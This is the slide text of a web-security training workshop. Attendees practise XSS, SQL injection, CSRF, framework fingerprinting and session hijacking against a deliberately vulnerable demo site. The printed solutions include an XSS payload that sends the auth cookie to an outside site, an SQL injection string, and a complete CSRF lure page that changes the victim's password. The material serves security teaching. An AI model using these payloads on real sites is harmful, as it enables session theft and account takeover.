Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
We re gonna turn you into lean, mean hacking machines!
Because if we don t, these kids are going to hack you Jake Davies, 19 (and his mum) Ryan Cleary, 20 (and his mum) Curtis Gervais, 16, awaiting trial (probably with his mum)
Who are we protecting our assets from? $10.8B per annum Hacker Resources Can invest where ROI makes sense Pocket money Hacker Competency Bored kids Common Thieves Super Hackers
Your Hacker Tools for Today A Wi-Fi connection A mobile device you can configure a proxy on I have a few spares Google Chrome Or another browser with good dev tools Fiddler getfiddler.com Or another HTTP proxy like charlesproxy.com
What we ll be covering Introduction 30 mins 09:00 Discovering risks via the browser 30 mins 09:30 Using an HTTP proxy 30 mins 10:00 Break 15 mins 10:30 XSS 50 mins 10:45 SQL injection 55 mins 11:35 Lunch 1 hour 12:30 Mobile APIs 60 mins 13:30 CSRF 50 mins 14:30 Break 15 mins 15:20 Framework disclosure 30 mins 15:35 Session hijacking 35 mins 16:05 Wrap up 20 mins 16:40 Close 17:00
Exercise 1 Discovering risks via the browser
Exercise 1 Chrome developer tools Familiarise yourself with the dev tools Elements, network, cookies, console, por uh, incognito Create an account at hackyourselffirst.troyhunt.com Hacker Challenge 1: Identify three security risks with the registration process
Exercise 2 Using an HTTP proxy
Exercise 2 Using an HTTP proxy Familiarise yourself with Fiddler Watch requests and their headers, review response body and headers, use the composer to reissue request Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID
Exercise 3 Reflected cross site scripting (XSS)
Understanding XSS mysite.com/?q=<script>alert('yay mysite.com/?q=ferrari XSS!');</script> <p>you searched for <%= Request.QueryString["q"] %></p> <p>you searched <p>you for <script>alert('yay searched for ferrari</p> XSS!');</script></p>
Some quick XSS tips Check the encoding context You encode for HTML differently than for JavaScript Check the encoding consistency Often it s manual and some characters are not encoded Play with JavaScript to: Manipulate the DOM, access cookies, load external resources
Exercise 3 XSS Establish the encoding practices on the search page What s encoded, what s not, what contexts are encoding What can be accessed or manipulated in the DOM Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution http://hackyourselffirst.troyhunt.com/search?searchterm= ');document.location='http://www.troyhunt.com/?c='%2bdocument.cookie;//
Exercise 4 SQL injection (SQLi)
Understanding SQLi mysite.com/?id=foo mysite.com/?id=1 var query = "SELECT * FROM Widget WHERE Id = " query += Request.Query["id"] SELECT ** FROM Widget WHERE Id Id = = foo 1 Invalid column name 'foo'
Some quick SQLi tips Think of SQL commands which disclose structure sys.tables, sys.columns, system commands Consider how you d enumerate through records Select top x rows asc then top 1 rows from that desc Write out how you think the query works internally SELECT * FROM Supercar ORDER BY [URL param]
Exercise 4 SQLi Explore the database using error-based SQLi Construct strings to disclose internal data Cast things to invalid types to disclose via exceptions Hacker Challenge 4: Discover the version of the DB
Exercise 4 solution http://hackyourselffirst.troyhunt.com/make/1?orderby=@@version*1
Exercise 5 Mobile APIs
Understanding mobile APIs
Who are we protecting our APIs from? HTTP(S) Attacker Attacker
Trusting the Fiddler root cert http://ipv4.fiddler:8888
Some quick mobile API tips Look at the HTTP requests for sensitive data Credentials, account info, PII Remove the proxy s root cert and make HTTPS requests Is cert validation actually enabled in the app? In your own apps: Parameter tampering, auth bypass, direct object refs
Exercise 5 Mobile APIs Proxy your device through Fiddler or Charles Inspect the traffic of your apps Perform normal activities and monitor requests Hacker Challenge 5: Find three things of interest doesn t have to be security related
Exercise 6 Cross site request forgery (CSRF)
Understanding CSRF POST /Login/Account Set-Cookie: AuthCookie=XXX GET /Path/To/Authenticated/Resource Cookie: AuthCookie=XXX CSRF here! Authenticated request!
Some quick CSRF tips Establish the request pattern to the target resource What fields are being sent Reconstruct the request from your own resource Normally a malicious page Lure the user into the malicious resource Usually requires incentivisation
Exercise 6 CSRF Mount your own CSRF attack Reproduce a legitimate request Use it to perform a malicious action Hacker Challenge 6: Change the present user s password when they load your page
Exercise 6 solution
Exercise 6 solution <html> <head> <title>win an iphone!!!</title> </head> <body style="text-align: center;"> <h1 style="font-size: 1.7em;">Want to win an iphone? Of course you do! Click the button below and it's yours!!!</h1> <form action="https://hackyourselffirst.troyhunt.com/account/changepassword" method="post" target="hiddenframe"> <input type="hidden" name="newpassword" value="hackpword" /> <input type="hidden" name="confirmpassword" value="hackpword" /> <input type="submit" value="i wanna win!" onclick="alert('you won! Click ok and it\'s done')" style="font-size: 2em;" /> </form> <p><img src="iphone.jpg" style="width: 900px;" /></p> <iframe name="hiddenframe" style="display: none;"></iframe> </body> </html>
Exercise 7 Framework disclosure
Understanding framework disclosure risks Learn of framework vulnerability Search web for vulnerable sites Pwn!
Some quick framework disclosure tips There are multiple ways the framework is leaked This can differ by web stack Different requests can cause different leakage Consider the different ways in which a site may responds Also think about other ways disclosure happens Markup structure, naming patterns, etc
Exercise 7 Framework disclosure Discover the internal framework of the site Identify what s being implicitly leaked Cause the app to leak additional information Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed
Exercise 7 solution 1. Response headers (server, powered by, ASP.NET version, MVC version) 2. Unhandled exception stack trace (includes minor ASP.NET version) 3. Session ID cookie name (ASP.NET_SessionId) 4. Error page for 404 (includes minor ASP.NET version) 5. Elmah 6. HTTP fingerprinting
HTTP field ordering Apache 1.3.23 HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10:49 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 ETag: "32417-c4-3e5d8a83" Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/html IIS 5.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com Date: Fri, 01 Jan 1999 20:13:52 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 ETag: W/"e0d362a4c335be1:ae1" Content-Length: 133
Other fingerprinting indicators Forbidden resource Improper HTTP version Improper protocol
Exercise 8 Session hijacking
Understanding session hijacking POST /Login/Account Set-Cookie: AuthCookie=XXX Attacker steals the cookie Attacker issues authenticated request with the cookie
Some quick session hijacking tips Persistence over HTTP can be done multiple ways Cookie, URL Session or auth ID can be obtained multiple ways Insecure transport, referrer, stored in exceptions, XSS Factors that limit hijacking Short duration expiry, keyed to client device / IP
Exercise 8 Session hijacking Mount a session hijacking attack Identify how auth is being persisted Obtain the auth token using a vuln in the app Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser